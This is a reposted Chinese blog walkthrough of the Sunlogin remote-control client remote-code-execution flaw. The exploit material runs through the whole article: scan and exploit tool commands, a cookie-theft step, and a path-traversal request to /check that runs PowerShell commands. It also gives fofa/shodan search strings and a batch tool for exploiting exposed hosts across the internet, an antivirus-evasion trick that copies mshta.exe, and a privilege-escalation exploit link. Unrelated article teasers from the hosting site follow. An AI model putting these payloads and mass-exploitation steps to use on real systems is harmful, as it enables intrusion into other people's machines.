一：漏洞摘要

向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下，轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能，这不仅为用户的使用带来很多便捷，还能为其提供各类保障。

Sunlogin RCE 是漏洞发生在接口/check处，当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用，客户端开启客户端会自动随机开启一个大于40000的端口号。

影响客户端版本:

11.1.1
10.3.0.27372
11.0.0.33162

二：快速复现

操作系统：Windows 10

目标靶机IP地址：192.168.50.223

向日葵客户端版本：11.0.0.33162


向日葵漏洞版本下载：
链接：https://pan.baidu.com/s/1FuuCz3iPVhxwigTQs5T07g?pwd=dw7t 
提取码：dw7t

步骤一：在Windows 10中安装向日葵程序....并关闭系统防火墙...

步骤二：使用一下工具对其进行漏洞探测与利用...


###工具项目地址
https://github.com/Mr-xn/sunlogin_rce
 
###漏洞探测
xrkRce.exe -h 192.168.50.223 -t scan
 
###漏洞利用
xrkRce.exe -h 192.168.50.223 -t rce -p 49843 -c "whoami"

三：手工复现

基于以上环境进行测试....

步骤一：使用工具对目标进行端口扫描....使用一下命令进行访问测试发现49843端口比较可疑....

curl 192.168.50.223:48943

步骤二：浏览器访问以下地址，获取其Cookie值..


###示例
ip+端口号+cgi-bin/rpc?action=verify-haras
###拼接访问
http://192.168.50.223:49843/cgi-bin/rpc?action=verify-haras
###Cookie信息
PEYMEjYeyKrFKyNqn18536BWNYfLDz25

步骤三：访问以下地址并使用BP抓包在其添加上Cookie信息，进行漏洞验证...


###Get URL
http://192.168.50.223:49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
###Cookie Info
Cookie:CID=PEYMEjYeyKrFKyNqn18536BWNYfLDz25

步骤四：漏洞原理....

当向日葵客户端在windows运行时，会连接远程Oray的服务器，开放对外接口，接口由sunlogin处理，且开启监听外部的连接访问端口，大概在50000左右，可通过工具测试，低版本向日葵RCE主要发生在对外开放的接口/check处，当cmd的值为ping/nslookup开头时触发。

四：批量利用

步骤一：使用shodan进行资产搜索...并到处数据到TXT文本中...


fofa:body="Verification failure" && port="49155"
shodan:http.html:"Verification failure" port:>40000
 
###注意
由于shodan很少扫描收录高端口号。所以该结果并不准确。

步骤二：下载以下项目并部署好环境将以上的资产放入Target.txt中进行批量测试...

https://github.com/j2ekim/sunlogin_rce

步骤三：使用利用工具进行漏洞验证猜想....

后续利用：+360安全防护

某远控RCE绕过某数字的利用方式


copy mshta.exe C:\ProgramData\ms.exe
cmd /c C:\ProgramData\ms.exe
cmd /c C:\ProgramData\ms.exe

五：提权利用

https://github.com/Ryze-T/CNVD-2022-10270-LPE

参考文章：

向日葵远程代码执行漏洞（RCE）漏洞复现 - Kevin's Blog
【漏洞复现】Sunlogin RCE 向日葵远程代码执行 – Adminxe's Blog

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/357978.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

python 建筑建模_不可错过的python 街道数据爬取和分析神器！

hello 大家好！最近遇到一堆关于街道数据分析的问题，又不想去使用百度和高德的API，有的功能还是得付费，为了学习不想掏钱，那么有什么办法么？答： 有！必须有！今天给大家分享…

我是如何使用git把本地代码上传到CODECHINA上的，值得借鉴

背景：最近开发了一款城市公交查询系统。没有把代码上传到github，传到CODECHINA试试，先占个坑。首先进入自己的个人主页，没有自己资料信息的先设置一下， codeChina官网：https://codechina.csdn.net/ 上传需…

Vmware中centos7共享文件夹

1.安装vmtools的步骤 1.进入centos 2.点击vm菜单的->install vmware tools 3.centos会出现一个vm的安装包 ，xx.tar.gz 4.拷贝到/opt 5.使用解压命令tar，得到一个安装文件 cd /opt //进入到opt目录 tar -zxvf xx.tar.gz //解压缩命令 …

电感发出声音怎么解决_如何解决多层PCB设计时的EMI

解决EMI问题的办法很多，现代的EMI抑制方法包括：利用EMI抑制涂层、选用合适的EMI抑制零配件和EMI仿真设计等。本文从最基本的PCB布板出发，讨论PCB分层堆叠在控制EMI辐射中的作用和设计技巧。电源汇流排在IC的电源引脚附近合理地安置适当容量的…

电子商务网站放大效果的三种常用的实现方式。

预览效果（这里截取静态，有兴趣的可以运行下面的代码）：实现方式1. <!DOCTYPE html> <html> <head><meta charset="UTF-8"><title>电子商务网站放大镜效果1</title><style type="text/css">html, body, div…

CentOS宝塔搭建（超详细）

本文讲述CentOS搭建宝塔全过程，我会手把手的教你哦~ 1、云平台控制台创建及安装CentOS系统。不管哪个云应该都有这个系统的。注意事项： （1）CentOS系统建议7.4、7.6版本，切勿安装8版本！ （2&…

api 定位微信小程序精度_小程序的api是什么

微信小程序API(Application Programming Interface)，应用程序编程接口，也是程序员口中常说的接口。其实api并不专属于小程序，任何编程语言或程序形态都有相对应的api。而我们今天谈的小程序api，是微信小程序团队为了方便开发人员制…

前端全栈大佬是如何使用javaScript实现一个焦点图

效果图：代码如下： <!DOCTYPE html> <html> <head lang="en"><meta charset="UTF-8"><title>焦点图</title><style>ul,li{list-style: none;}#outer{width: 400px;height: 300px;position: relative;margin:…

Spark入门：也可以用Java创建轻量级的RESTful应用程序

最近，我一直在使用Spark （一种Java的Web框架，与Apache Spark 不相关）编写RESTful服务。当我们计划写这篇文章时，我已经做好了不可避免的接口，样板代码和深层层次结构的Java风格的准备。我很惊讶地发现&am…

前端全栈大佬是如何使用javaScript实现一个轮播图

效果图：代码如下： <!DOCTYPE html> <html> <head lang="en"><meta charset="UTF-8"><title>轮播图</title><style>ul,li{list-style: none;}#outer{width: 400px;height: 300px;position: relative;margin:…

$Win7\xp添加虚拟网Microsoft Loopback Adapter$